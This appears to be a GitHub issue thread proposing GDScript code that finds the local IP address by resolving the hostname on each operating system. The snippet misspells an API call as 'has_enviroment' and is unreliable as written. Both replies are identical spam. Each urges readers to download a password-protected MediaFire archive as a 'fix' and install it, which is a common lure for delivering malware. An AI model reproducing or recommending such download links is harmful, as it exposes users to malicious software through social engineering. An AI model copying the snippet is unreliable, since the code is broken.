### ISSUE TITLE
Get the local IP address

### ISSUE THREAD

**Issue by mkh-user** [Subject-Team/Subject-Library#19]
**New function code**
```
var ip_adress :String

if OS.has_feature("windows"):
	if OS.has_enviroment("COMPUTERNAME"):
		ip_adress =  IP.resolve_hostname(str(OS.get_environment("COMPUTERNAME")),1)
elif OS.has_feature("x11"):
	if OS.has_enviroment("HOSTNAME"):
		ip_adress =  IP.resolve_hostname(str(OS.get_environment("HOSTNAME")),1)
elif OS.has_feature("OSX"):
	if OS.has_enviroment("HOSTNAME"):
		ip_adress =  IP.resolve_hostname(str(OS.get_environment("HOSTNAME")),1)
```
**Documentation**
```
## No Docs
```

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
